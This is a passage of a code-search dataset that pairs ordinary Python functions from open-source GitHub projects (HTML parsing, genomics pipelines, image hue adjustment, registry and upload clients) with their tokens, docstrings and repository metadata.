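from dclab.downsampling import downsample_grid  # import path assumed from the record's dclab/downsampling.py

# Synthetic 2D scatter data: 10000 correlated points.
rng = np.random.RandomState(0)
a = rng.normal(size=10000)
b = 0.5 * a + rng.normal(scale=0.3, size=10000)

# Keep exactly 500 points; ret_idx=True also returns the boolean mask.
dsa, dsb, idx = downsample_grid(a, b, samples=500, ret_idx=True)

assert dsa.size == 500 and idx.sum() == 500
assert np.array_equal(a[idx], dsa)  # the mask maps the kept points back into the full array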
BD2KGenomics/toil-scripts
src/toil_scripts/adam_pipeline/adam_preprocessing.py
https://github.com/BD2KGenomics/toil-scripts/blob/f878d863defcdccaabb7fe06f991451b7a198fb7/src/toil_scripts/adam_pipeline/adam_preprocessing.py#L200-L210
def upload_data(job, master_ip, inputs, hdfs_name, upload_name, spark_on_toil): """ Upload file hdfsName from hdfs to s3 """ if mock_mode(): truncate_file(master_ip, hdfs_name, spark_on_toil) log.info("Uploading output BAM %s to %s.", hdfs_name, upload_name) call_conductor(job, master_ip, hdfs_name, upload_name, memory=inputs.memory) remove_file(master_ip, hdfs_name, spark_on_toil)
[ "def", "upload_data", "(", "job", ",", "master_ip", ",", "inputs", ",", "hdfs_name", ",", "upload_name", ",", "spark_on_toil", ")", ":", "if", "mock_mode", "(", ")", ":", "truncate_file", "(", "master_ip", ",", "hdfs_name", ",", "spark_on_toil", ")", "log", ".", "info", "(", "\"Uploading output BAM %s to %s.\"", ",", "hdfs_name", ",", "upload_name", ")", "call_conductor", "(", "job", ",", "master_ip", ",", "hdfs_name", ",", "upload_name", ",", "memory", "=", "inputs", ".", "memory", ")", "remove_file", "(", "master_ip", ",", "hdfs_name", ",", "spark_on_toil", ")" ]
Upload file hdfsName from hdfs to s3
[ "Upload", "file", "hdfsName", "from", "hdfs", "to", "s3" ]
python
train
37.454545
kata198/AdvancedHTMLParser
AdvancedHTMLParser/Tags.py
https://github.com/kata198/AdvancedHTMLParser/blob/06aeea5d8e2ea86e155aae0fc237623d3e9b7f9d/AdvancedHTMLParser/Tags.py#L673-L687
def removeChildren(self, children): ''' removeChildren - Remove multiple child AdvancedTags. @see removeChild @return list<AdvancedTag/None> - A list of all tags removed in same order as passed. Item is "None" if it was not attached to this node, and thus was not removed. ''' ret = [] for child in children: ret.append( self.removeChild(child) ) return ret
[ "def", "removeChildren", "(", "self", ",", "children", ")", ":", "ret", "=", "[", "]", "for", "child", "in", "children", ":", "ret", ".", "append", "(", "self", ".", "removeChild", "(", "child", ")", ")", "return", "ret" ]
removeChildren - Remove multiple child AdvancedTags. @see removeChild @return list<AdvancedTag/None> - A list of all tags removed in same order as passed. Item is "None" if it was not attached to this node, and thus was not removed.
[ "removeChildren", "-", "Remove", "multiple", "child", "AdvancedTags", "." ]
python
train
30.066667
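A short sketch of removeChildren from the AdvancedHTMLParser record above. The parser construction and the parseStr/getElementById/children calls are assumed from that library's usual API and are not shown in the record itself:

import AdvancedHTMLParser

parser = AdvancedHTMLParser.AdvancedHTMLParser()
parser.parseStr('<ul id="menu"><li>a</li><li>b</li><li>c</li></ul>')

menu = parser.getElementById('menu')
first_two = menu.children[:2]  # the first two <li> AdvancedTag children

# Detach both tags in one call; the returned list mirrors the input order,
# with None in place of any tag that was not actually attached to menu.
removed = menu.removeChildren(first_two)
print(len(removed), len(menu.children))  # 2 1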
google/grumpy
third_party/pythonparser/parser.py
https://github.com/google/grumpy/blob/3ec87959189cfcdeae82eb68a47648ac25ceb10b/third_party/pythonparser/parser.py#L530-L535
def single_input(self, body): """single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE""" loc = None if body != []: loc = body[0].loc return ast.Interactive(body=body, loc=loc)
[ "def", "single_input", "(", "self", ",", "body", ")", ":", "loc", "=", "None", "if", "body", "!=", "[", "]", ":", "loc", "=", "body", "[", "0", "]", ".", "loc", "return", "ast", ".", "Interactive", "(", "body", "=", "body", ",", "loc", "=", "loc", ")" ]
single_input: NEWLINE | simple_stmt | compound_stmt NEWLINE
[ "single_input", ":", "NEWLINE", "|", "simple_stmt", "|", "compound_stmt", "NEWLINE" ]
python
valid
36.833333
quantmind/dynts
dynts/backends/r/base.py
https://github.com/quantmind/dynts/blob/21ac57c648bfec402fa6b1fe569496cf098fb5e8/dynts/backends/r/base.py#L117-L126
def rcts(self, command, *args, **kwargs): '''General function for applying a rolling R function to a timeserie''' cls = self.__class__ name = kwargs.pop('name','') date = kwargs.pop('date',None) data = kwargs.pop('data',None) kwargs.pop('bycolumn',None) ts = cls(name=name,date=date,data=data) ts._ts = self.rc(command, *args, **kwargs) return ts
[ "def", "rcts", "(", "self", ",", "command", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "cls", "=", "self", ".", "__class__", "name", "=", "kwargs", ".", "pop", "(", "'name'", ",", "''", ")", "date", "=", "kwargs", ".", "pop", "(", "'date'", ",", "None", ")", "data", "=", "kwargs", ".", "pop", "(", "'data'", ",", "None", ")", "kwargs", ".", "pop", "(", "'bycolumn'", ",", "None", ")", "ts", "=", "cls", "(", "name", "=", "name", ",", "date", "=", "date", ",", "data", "=", "data", ")", "ts", ".", "_ts", "=", "self", ".", "rc", "(", "command", ",", "*", "args", ",", "*", "*", "kwargs", ")", "return", "ts" ]
General function for applying a rolling R function to a time series
[ "General", "function", "for", "applying", "a", "rolling", "R", "function", "to", "a", "time", "series" ]
python
train
41.9
calmjs/nunja
src/nunja/registry.py
https://github.com/calmjs/nunja/blob/37ba114ca2239322718fd9994bb078c037682c33/src/nunja/registry.py#L260-L271
def verify_path(self, mold_id_path): """ Lookup and verify path. """ try: path = self.lookup_path(mold_id_path) if not exists(path): raise KeyError except KeyError: raise_os_error(ENOENT) return path
[ "def", "verify_path", "(", "self", ",", "mold_id_path", ")", ":", "try", ":", "path", "=", "self", ".", "lookup_path", "(", "mold_id_path", ")", "if", "not", "exists", "(", "path", ")", ":", "raise", "KeyError", "except", "KeyError", ":", "raise_os_error", "(", "ENOENT", ")", "return", "path" ]
Lookup and verify path.
[ "Lookup", "and", "verify", "path", "." ]
python
train
24.083333
galaxyproject/pulsar
pulsar/client/client.py
https://github.com/galaxyproject/pulsar/blob/9ab6683802884324652da0a9f0808c7eb59d3ab4/pulsar/client/client.py#L196-L220
def fetch_output(self, path, name, working_directory, action_type, output_type): """ Fetch (transfer, copy, etc...) an output from the remote Pulsar server. **Parameters** path : str Local path of the dataset. name : str Remote name of file (i.e. path relative to remote staging output or working directory). working_directory : str Local working_directory for the job. action_type : str Where to find file on Pulsar (output_workdir or output). legacy is also an option in this case Pulsar is asked for location - this will only be used if targetting an older Pulsar server that didn't return statuses allowing this to be inferred. """ if output_type in ['output_workdir', 'output_metadata']: self._populate_output_path(name, path, action_type, output_type) elif output_type == 'output': self._fetch_output(path=path, name=name, action_type=action_type) else: raise Exception("Unknown output_type %s" % output_type)
[ "def", "fetch_output", "(", "self", ",", "path", ",", "name", ",", "working_directory", ",", "action_type", ",", "output_type", ")", ":", "if", "output_type", "in", "[", "'output_workdir'", ",", "'output_metadata'", "]", ":", "self", ".", "_populate_output_path", "(", "name", ",", "path", ",", "action_type", ",", "output_type", ")", "elif", "output_type", "==", "'output'", ":", "self", ".", "_fetch_output", "(", "path", "=", "path", ",", "name", "=", "name", ",", "action_type", "=", "action_type", ")", "else", ":", "raise", "Exception", "(", "\"Unknown output_type %s\"", "%", "output_type", ")" ]
Fetch (transfer, copy, etc...) an output from the remote Pulsar server. **Parameters** path : str Local path of the dataset. name : str Remote name of the file (i.e. path relative to the remote staging output or working directory). working_directory : str Local working_directory for the job. action_type : str Where to find the file on Pulsar (output_workdir or output). legacy is also an option; in this case Pulsar is asked for the location - this will only be used if targeting an older Pulsar server that didn't return statuses allowing this to be inferred.
[ "Fetch", "(", "transfer", "copy", "etc", "...", ")", "an", "output", "from", "the", "remote", "Pulsar", "server", "." ]
python
train
44.52
PGower/PyCanvas
pycanvas/apis/pages.py
https://github.com/PGower/PyCanvas/blob/68520005382b440a1e462f9df369f54d364e21e8/pycanvas/apis/pages.py#L339-L358
def show_page_courses(self, url, course_id): """ Show page. Retrieve the content of a wiki page """ path = {} data = {} params = {} # REQUIRED - PATH - course_id """ID""" path["course_id"] = course_id # REQUIRED - PATH - url """ID""" path["url"] = url self.logger.debug("GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}".format(params=params, data=data, **path)) return self.generic_request("GET", "/api/v1/courses/{course_id}/pages/{url}".format(**path), data=data, params=params, single_item=True)
[ "def", "show_page_courses", "(", "self", ",", "url", ",", "course_id", ")", ":", "path", "=", "{", "}", "data", "=", "{", "}", "params", "=", "{", "}", "# REQUIRED - PATH - course_id\r", "\"\"\"ID\"\"\"", "path", "[", "\"course_id\"", "]", "=", "course_id", "# REQUIRED - PATH - url\r", "\"\"\"ID\"\"\"", "path", "[", "\"url\"", "]", "=", "url", "self", ".", "logger", ".", "debug", "(", "\"GET /api/v1/courses/{course_id}/pages/{url} with query params: {params} and form data: {data}\"", ".", "format", "(", "params", "=", "params", ",", "data", "=", "data", ",", "*", "*", "path", ")", ")", "return", "self", ".", "generic_request", "(", "\"GET\"", ",", "\"/api/v1/courses/{course_id}/pages/{url}\"", ".", "format", "(", "*", "*", "path", ")", ",", "data", "=", "data", ",", "params", "=", "params", ",", "single_item", "=", "True", ")" ]
Show page. Retrieve the content of a wiki page
[ "Show", "page", ".", "Retrieve", "the", "content", "of", "a", "wiki", "page" ]
python
train
33.4
ManiacalLabs/BiblioPixel
bibliopixel/project/edit_queue.py
https://github.com/ManiacalLabs/BiblioPixel/blob/fd97e6c651a4bbcade64733847f4eec8f7704b7c/bibliopixel/project/edit_queue.py#L15-L24
def put_edit(self, f, *args, **kwds): """ Defer an edit to run on the EditQueue. :param callable f: The function to be called :param tuple args: Positional arguments to the function :param tuple kwds: Keyword arguments to the function :throws queue.Full: if the queue is full """ self.put_nowait(functools.partial(f, *args, **kwds))
[ "def", "put_edit", "(", "self", ",", "f", ",", "*", "args", ",", "*", "*", "kwds", ")", ":", "self", ".", "put_nowait", "(", "functools", ".", "partial", "(", "f", ",", "*", "args", ",", "*", "*", "kwds", ")", ")" ]
Defer an edit to run on the EditQueue. :param callable f: The function to be called :param tuple args: Positional arguments to the function :param tuple kwds: Keyword arguments to the function :throws queue.Full: if the queue is full
[ "Defer", "an", "edit", "to", "run", "on", "the", "EditQueue", "." ]
python
valid
38.8
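A sketch of deferring work through put_edit from the BiblioPixel record above. Constructing EditQueue with no arguments and draining it with get_nowait are assumptions based on the queue-style put_nowait call in the code; only put_edit itself comes from the record:

from bibliopixel.project.edit_queue import EditQueue  # module path taken from the record

settings = {'brightness': 128}

q = EditQueue()  # assumed to build like a plain queue.Queue
q.put_edit(settings.__setitem__, 'brightness', 255)  # nothing runs yet, the call is only enqueued

# Later, the queue's owner pops the stored partial and executes it.
edit = q.get_nowait()
edit()
print(settings['brightness'])  # 255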
RudolfCardinal/pythonlib
cardinal_pythonlib/convert.py
https://github.com/RudolfCardinal/pythonlib/blob/0b84cb35f38bd7d8723958dae51b480a829b7227/cardinal_pythonlib/convert.py#L113-L122
def convert_attrs_to_lowercase(obj: Any, attrs: Iterable[str]) -> None: """ Converts the specified attributes of an object to lower case, modifying the object in place. """ for a in attrs: value = getattr(obj, a) if value is None: continue setattr(obj, a, value.lower())
[ "def", "convert_attrs_to_lowercase", "(", "obj", ":", "Any", ",", "attrs", ":", "Iterable", "[", "str", "]", ")", "->", "None", ":", "for", "a", "in", "attrs", ":", "value", "=", "getattr", "(", "obj", ",", "a", ")", "if", "value", "is", "None", ":", "continue", "setattr", "(", "obj", ",", "a", ",", "value", ".", "lower", "(", ")", ")" ]
Converts the specified attributes of an object to lower case, modifying the object in place.
[ "Converts", "the", "specified", "attributes", "of", "an", "object", "to", "lower", "case", "modifying", "the", "object", "in", "place", "." ]
python
train
31.7
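A usage sketch for convert_attrs_to_lowercase above; the Person class is purely illustrative and the import path follows the record's cardinal_pythonlib/convert.py:

from cardinal_pythonlib.convert import convert_attrs_to_lowercase


class Person:  # hypothetical object, only here to illustrate the call
    def __init__(self) -> None:
        self.forename = "ALICE"
        self.surname = "SMITH"
        self.nickname = None  # None values are skipped, not lower-cased


p = Person()
convert_attrs_to_lowercase(p, ["forename", "surname", "nickname"])
print(p.forename, p.surname, p.nickname)  # alice smith None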
tensorlayer/tensorlayer
tensorlayer/prepro.py
https://github.com/tensorlayer/tensorlayer/blob/aa9e52e36c7058a7e6fd81d36563ca6850b21956/tensorlayer/prepro.py#L1752-L1808
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False): """Adjust hue of an RGB image. This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type. For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. Parameters ----------- im : numpy.array An image with values between 0 and 255. hout : float The scale value for adjusting hue. - If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue. - If is_offset is True, add this value as the offset to the hue channel. is_offset : boolean Whether `hout` is added on HSV as offset or not. Default is True. is_clip : boolean If HSV value smaller than 0, set to 0. Default is True. is_random : boolean If True, randomly change hue. Default is False. Returns ------- numpy.array A processed image. Examples --------- Random, add a random value between -0.2 and 0.2 as the offset to every hue values. >>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False) Non-random, make all hue to green. >>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False) References ----------- - `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. - `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__. - `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__. """ hsv = rgb_to_hsv(im) if is_random: hout = np.random.uniform(-hout, hout) if is_offset: hsv[..., 0] += hout else: hsv[..., 0] = hout if is_clip: hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots rgb = hsv_to_rgb(hsv) return rgb
[ "def", "adjust_hue", "(", "im", ",", "hout", "=", "0.66", ",", "is_offset", "=", "True", ",", "is_clip", "=", "True", ",", "is_random", "=", "False", ")", ":", "hsv", "=", "rgb_to_hsv", "(", "im", ")", "if", "is_random", ":", "hout", "=", "np", ".", "random", ".", "uniform", "(", "-", "hout", ",", "hout", ")", "if", "is_offset", ":", "hsv", "[", "...", ",", "0", "]", "+=", "hout", "else", ":", "hsv", "[", "...", ",", "0", "]", "=", "hout", "if", "is_clip", ":", "hsv", "[", "...", ",", "0", "]", "=", "np", ".", "clip", "(", "hsv", "[", "...", ",", "0", "]", ",", "0", ",", "np", ".", "inf", ")", "# Hao : can remove green dots", "rgb", "=", "hsv_to_rgb", "(", "hsv", ")", "return", "rgb" ]
Adjust hue of an RGB image. This is a convenience method that converts an RGB image to float representation, converts it to HSV, adds an offset to the hue channel, converts back to RGB and then back to the original data type. For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__ and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. Parameters ----------- im : numpy.array An image with values between 0 and 255. hout : float The scale value for adjusting hue. - If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue. - If is_offset is True, add this value as the offset to the hue channel. is_offset : boolean Whether `hout` is added to HSV as an offset or not. Default is True. is_clip : boolean If the HSV value is smaller than 0, set it to 0. Default is True. is_random : boolean If True, randomly change hue. Default is False. Returns ------- numpy.array A processed image. Examples --------- Random: add a random value between -0.2 and 0.2 as the offset to every hue value. >>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False) Non-random: set all hue values to green. >>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False) References ----------- - `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__. - `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__. - `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
[ "Adjust", "hue", "of", "an", "RGB", "image", "." ]
python
valid
38.140351
chrislim2888/IP2Location-Python
IP2Location.py
https://github.com/chrislim2888/IP2Location-Python/blob/6b2a7d3a5e61c9f8efda5ae96c7064f9a7714621/IP2Location.py#L189-L192
def get_mcc(self, ip): ''' Get mcc ''' rec = self.get_all(ip) return rec and rec.mcc
[ "def", "get_mcc", "(", "self", ",", "ip", ")", ":", "rec", "=", "self", ".", "get_all", "(", "ip", ")", "return", "rec", "and", "rec", ".", "mcc" ]
Get mcc
[ "Get", "mcc" ]
python
train
26.25
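A sketch for the IP2Location get_mcc record above. The open() call and the BIN file name are assumptions; a database that includes mobile carrier fields (e.g. a DB24 file) is needed for mcc to be populated:

import IP2Location

db = IP2Location.IP2Location()
db.open("IP2LOCATION-SAMPLE.BIN")  # placeholder path to a local BIN database with mobile fields

# get_mcc() is a thin wrapper: it runs get_all() and returns only the mcc field.
print(db.get_mcc("8.8.8.8"))

# Equivalent long form when several fields are needed from one lookup.
record = db.get_all("8.8.8.8")
print(record.mcc)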
analyzere/analyzere-python
analyzere/base_resources.py
https://github.com/analyzere/analyzere-python/blob/0593d5b7b69c4df6d6dbc80387cc6ff5dc5f4e8f/analyzere/base_resources.py#L309-L366
def upload_data(self, file_or_str, chunk_size=analyzere.upload_chunk_size, poll_interval=analyzere.upload_poll_interval, upload_callback=lambda x: None, commit_callback=lambda x: None): """ Accepts a file-like object or string and uploads it. Files are automatically uploaded in chunks. The default chunk size is 16MiB and can be overwritten by specifying the number of bytes in the ``chunk_size`` variable. Accepts an optional poll_interval for temporarily overriding the default value `analyzere.upload_poll_interval`. Implements the tus protocol. Takes optional callbacks that return the percentage complete for the given "phase" of upload: upload/commit. Callback values are returned as 10.0 for 10% """ if not callable(upload_callback): raise Exception('provided upload_callback is not callable') if not callable(commit_callback): raise Exception('provided commit_callback is not callable') file_obj = StringIO(file_or_str) if isinstance( file_or_str, six.string_types) else file_or_str # Upload file with known entity size if file object supports random # access. length = None if hasattr(file_obj, 'seek'): length = utils.file_length(file_obj) # Initiate upload session request_raw('post', self._data_path, headers={'Entity-Length': str(length)}) else: request_raw('post', self._data_path) # Upload chunks for chunk, offset in utils.read_in_chunks(file_obj, chunk_size): headers = {'Offset': str(offset), 'Content-Type': 'application/offset+octet-stream'} request_raw('patch', self._data_path, headers=headers, body=chunk) # if there is a known size, and an upload callback, call it if length: upload_callback(offset * 100.0 / length) upload_callback(100.0) # Commit the session request_raw('post', self._commit_path) # Block until data has finished processing while True: resp = self.upload_status if (resp.status == 'Processing Successful' or resp.status == 'Processing Failed'): commit_callback(100.0) return resp else: commit_callback(float(resp.commit_progress)) time.sleep(poll_interval)
[ "def", "upload_data", "(", "self", ",", "file_or_str", ",", "chunk_size", "=", "analyzere", ".", "upload_chunk_size", ",", "poll_interval", "=", "analyzere", ".", "upload_poll_interval", ",", "upload_callback", "=", "lambda", "x", ":", "None", ",", "commit_callback", "=", "lambda", "x", ":", "None", ")", ":", "if", "not", "callable", "(", "upload_callback", ")", ":", "raise", "Exception", "(", "'provided upload_callback is not callable'", ")", "if", "not", "callable", "(", "commit_callback", ")", ":", "raise", "Exception", "(", "'provided commit_callback is not callable'", ")", "file_obj", "=", "StringIO", "(", "file_or_str", ")", "if", "isinstance", "(", "file_or_str", ",", "six", ".", "string_types", ")", "else", "file_or_str", "# Upload file with known entity size if file object supports random", "# access.", "length", "=", "None", "if", "hasattr", "(", "file_obj", ",", "'seek'", ")", ":", "length", "=", "utils", ".", "file_length", "(", "file_obj", ")", "# Initiate upload session", "request_raw", "(", "'post'", ",", "self", ".", "_data_path", ",", "headers", "=", "{", "'Entity-Length'", ":", "str", "(", "length", ")", "}", ")", "else", ":", "request_raw", "(", "'post'", ",", "self", ".", "_data_path", ")", "# Upload chunks", "for", "chunk", ",", "offset", "in", "utils", ".", "read_in_chunks", "(", "file_obj", ",", "chunk_size", ")", ":", "headers", "=", "{", "'Offset'", ":", "str", "(", "offset", ")", ",", "'Content-Type'", ":", "'application/offset+octet-stream'", "}", "request_raw", "(", "'patch'", ",", "self", ".", "_data_path", ",", "headers", "=", "headers", ",", "body", "=", "chunk", ")", "# if there is a known size, and an upload callback, call it", "if", "length", ":", "upload_callback", "(", "offset", "*", "100.0", "/", "length", ")", "upload_callback", "(", "100.0", ")", "# Commit the session", "request_raw", "(", "'post'", ",", "self", ".", "_commit_path", ")", "# Block until data has finished processing", "while", "True", ":", "resp", "=", "self", ".", "upload_status", "if", "(", "resp", ".", "status", "==", "'Processing Successful'", "or", "resp", ".", "status", "==", "'Processing Failed'", ")", ":", "commit_callback", "(", "100.0", ")", "return", "resp", "else", ":", "commit_callback", "(", "float", "(", "resp", ".", "commit_progress", ")", ")", "time", ".", "sleep", "(", "poll_interval", ")" ]
Accepts a file-like object or string and uploads it. Files are automatically uploaded in chunks. The default chunk size is 16MiB and can be overwritten by specifying the number of bytes in the ``chunk_size`` variable. Accepts an optional poll_interval for temporarily overriding the default value `analyzere.upload_poll_interval`. Implements the tus protocol. Takes optional callbacks that return the percentage complete for the given "phase" of upload: upload/commit. Callback values are returned as 10.0 for 10%
[ "Accepts", "a", "file", "-", "like", "object", "or", "string", "and", "uploads", "it", ".", "Files", "are", "automatically", "uploaded", "in", "chunks", ".", "The", "default", "chunk", "size", "is", "16MiB", "and", "can", "be", "overwritten", "by", "specifying", "the", "number", "of", "bytes", "in", "the", "chunk_size", "variable", ".", "Accepts", "an", "optional", "poll_interval", "for", "temporarily", "overriding", "the", "default", "value", "analyzere", ".", "upload_poll_interval", ".", "Implements", "the", "tus", "protocol", ".", "Takes", "optional", "callbacks", "that", "return", "the", "percentage", "complete", "for", "the", "given", "phase", "of", "upload", ":", "upload", "/", "commit", ".", "Callback", "values", "are", "returned", "as", "10", ".", "0", "for", "10%" ]
python
train
43.448276
ARMmbed/yotta
yotta/lib/registry_access.py
https://github.com/ARMmbed/yotta/blob/56bc1e56c602fa20307b23fe27518e9cd6c11af1/yotta/lib/registry_access.py#L536-L553
def unpublish(namespace, name, version, registry=None): ''' Try to unpublish a recently published version. Return any errors that occur. ''' registry = registry or Registry_Base_URL url = '%s/%s/%s/versions/%s' % ( registry, namespace, name, version ) headers = _headersForRegistry(registry) response = requests.delete(url, headers=headers) response.raise_for_status() return None
[ "def", "unpublish", "(", "namespace", ",", "name", ",", "version", ",", "registry", "=", "None", ")", ":", "registry", "=", "registry", "or", "Registry_Base_URL", "url", "=", "'%s/%s/%s/versions/%s'", "%", "(", "registry", ",", "namespace", ",", "name", ",", "version", ")", "headers", "=", "_headersForRegistry", "(", "registry", ")", "response", "=", "requests", ".", "delete", "(", "url", ",", "headers", "=", "headers", ")", "response", ".", "raise_for_status", "(", ")", "return", "None" ]
Try to unpublish a recently published version. Return any errors that occur.
[ "Try", "to", "unpublish", "a", "recently", "published", "version", ".", "Return", "any", "errors", "that", "occur", "." ]
python
valid
24.555556
mapnik/Cascadenik
cascadenik/__init__.py
https://github.com/mapnik/Cascadenik/blob/82f66859340a31dfcb24af127274f262d4f3ad85/cascadenik/__init__.py#L42-L90
def load_map(map, src_file, output_dir, scale=1, cache_dir=None, datasources_cfg=None, user_styles=[], verbose=False): """ Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map(). Parameters: map: Instance of mapnik.Map. src_file: Location of stylesheet .mml file. Can be relative path, absolute path, or fully-qualified URL of a remote stylesheet. output_dir: ... Keyword Parameters: scale: Optional scale value for output map, 2 doubles the size for high-res displays. cache_dir: ... datasources_cfg: ... user_styles: A optional list of files or URLs, that override styles defined in the map source. These are evaluated in order, with declarations from later styles overriding those from earlier styles. verbose: ... """ scheme, n, path, p, q, f = urlparse(src_file) if scheme in ('file', ''): assert exists(src_file), "We'd prefer an input file that exists to one that doesn't" if cache_dir is None: cache_dir = expanduser(CACHE_DIR) # only make the cache dir if it wasn't user-provided if not isdir(cache_dir): mkdir(cache_dir) chmod(cache_dir, 0755) dirs = Directories(output_dir, realpath(cache_dir), dirname(src_file)) compile(src_file, dirs, verbose, datasources_cfg=datasources_cfg, user_styles=user_styles, scale=scale).to_mapnik(map, dirs)
[ "def", "load_map", "(", "map", ",", "src_file", ",", "output_dir", ",", "scale", "=", "1", ",", "cache_dir", "=", "None", ",", "datasources_cfg", "=", "None", ",", "user_styles", "=", "[", "]", ",", "verbose", "=", "False", ")", ":", "scheme", ",", "n", ",", "path", ",", "p", ",", "q", ",", "f", "=", "urlparse", "(", "src_file", ")", "if", "scheme", "in", "(", "'file'", ",", "''", ")", ":", "assert", "exists", "(", "src_file", ")", ",", "\"We'd prefer an input file that exists to one that doesn't\"", "if", "cache_dir", "is", "None", ":", "cache_dir", "=", "expanduser", "(", "CACHE_DIR", ")", "# only make the cache dir if it wasn't user-provided", "if", "not", "isdir", "(", "cache_dir", ")", ":", "mkdir", "(", "cache_dir", ")", "chmod", "(", "cache_dir", ",", "0755", ")", "dirs", "=", "Directories", "(", "output_dir", ",", "realpath", "(", "cache_dir", ")", ",", "dirname", "(", "src_file", ")", ")", "compile", "(", "src_file", ",", "dirs", ",", "verbose", ",", "datasources_cfg", "=", "datasources_cfg", ",", "user_styles", "=", "user_styles", ",", "scale", "=", "scale", ")", ".", "to_mapnik", "(", "map", ",", "dirs", ")" ]
Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map(). Parameters: map: Instance of mapnik.Map. src_file: Location of stylesheet .mml file. Can be relative path, absolute path, or fully-qualified URL of a remote stylesheet. output_dir: ... Keyword Parameters: scale: Optional scale value for output map, 2 doubles the size for high-res displays. cache_dir: ... datasources_cfg: ... user_styles: A optional list of files or URLs, that override styles defined in the map source. These are evaluated in order, with declarations from later styles overriding those from earlier styles. verbose: ...
[ "Apply", "a", "stylesheet", "source", "file", "to", "a", "given", "mapnik", "Map", "instance", "like", "mapnik", ".", "load_map", "()", ".", "Parameters", ":", "map", ":", "Instance", "of", "mapnik", ".", "Map", ".", "src_file", ":", "Location", "of", "stylesheet", ".", "mml", "file", ".", "Can", "be", "relative", "path", "absolute", "path", "or", "fully", "-", "qualified", "URL", "of", "a", "remote", "stylesheet", ".", "output_dir", ":", "...", "Keyword", "Parameters", ":", "scale", ":", "Optional", "scale", "value", "for", "output", "map", "2", "doubles", "the", "size", "for", "high", "-", "res", "displays", ".", "cache_dir", ":", "...", "datasources_cfg", ":", "...", "user_styles", ":", "A", "optional", "list", "of", "files", "or", "URLs", "that", "override", "styles", "defined", "in", "the", "map", "source", ".", "These", "are", "evaluated", "in", "order", "with", "declarations", "from", "later", "styles", "overriding", "those", "from", "earlier", "styles", ".", "verbose", ":", "..." ]
python
train
33.673469
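A sketch of driving cascadenik.load_map from the record above with python-mapnik. The stylesheet name and output directory are placeholders; only the load_map signature comes from the record:

import mapnik
import cascadenik

# Target an 800x600 map; 'style.mml' and 'compiled_styles/' are placeholder paths.
m = mapnik.Map(800, 600)
cascadenik.load_map(m, 'style.mml', 'compiled_styles/', verbose=False)

# Render with plain mapnik once the stylesheet has been applied.
m.zoom_all()
mapnik.render_to_file(m, 'map.png')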
bitesofcode/projex
projex/cli.py
https://github.com/bitesofcode/projex/blob/d31743ec456a41428709968ab11a2cf6c6c76247/projex/cli.py#L281-L302
def parser(scope, usage=''): """ Generates a default parser for the inputted scope. :param scope | <dict> || <module> usage | <str> callable | <str> :return <OptionParser> """ subcmds = [] for cmd in commands(scope): subcmds.append(cmd.usage()) if subcmds: subcmds.sort() usage += '\n\nSub-Commands:\n ' usage += '\n '.join(subcmds) parse = PARSER_CLASS(usage=usage) parse.prog = PROGRAM_NAME return parse
[ "def", "parser", "(", "scope", ",", "usage", "=", "''", ")", ":", "subcmds", "=", "[", "]", "for", "cmd", "in", "commands", "(", "scope", ")", ":", "subcmds", ".", "append", "(", "cmd", ".", "usage", "(", ")", ")", "if", "subcmds", ":", "subcmds", ".", "sort", "(", ")", "usage", "+=", "'\\n\\nSub-Commands:\\n '", "usage", "+=", "'\\n '", ".", "join", "(", "subcmds", ")", "parse", "=", "PARSER_CLASS", "(", "usage", "=", "usage", ")", "parse", ".", "prog", "=", "PROGRAM_NAME", "return", "parse" ]
Generates a default parser for the inputted scope. :param scope | <dict> || <module> usage | <str> callable | <str> :return <OptionParser>
[ "Generates", "a", "default", "parser", "for", "the", "inputted", "scope", ".", ":", "param", "scope", "|", "<dict", ">", "||", "<module", ">", "usage", "|", "<str", ">", "callable", "|", "<str", ">", ":", "return", "<OptionParser", ">" ]
python
train
23.681818
Yubico/python-pyhsm
pyhsm/aead_cmd.py
https://github.com/Yubico/python-pyhsm/blob/b6e2744d1ea15c352a0fc1d6ebc5950026b71311/pyhsm/aead_cmd.py#L58-L84
